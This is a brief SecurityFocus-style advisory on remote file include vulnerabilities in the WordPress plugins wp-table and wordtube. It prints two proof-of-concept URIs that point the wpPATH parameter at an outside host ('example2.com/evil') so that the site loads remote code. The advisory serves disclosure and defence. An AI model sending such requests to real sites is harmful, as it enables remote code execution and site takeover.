WordPress Plugins Multiple Remote File Include Vulnerabilities

Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:
http://www.example.com/wp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=http://www.example2.com/evil?
http://www.example.com/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.example2.com/evil?


 

Privacy Statement
Copyright 2010, SecurityFocus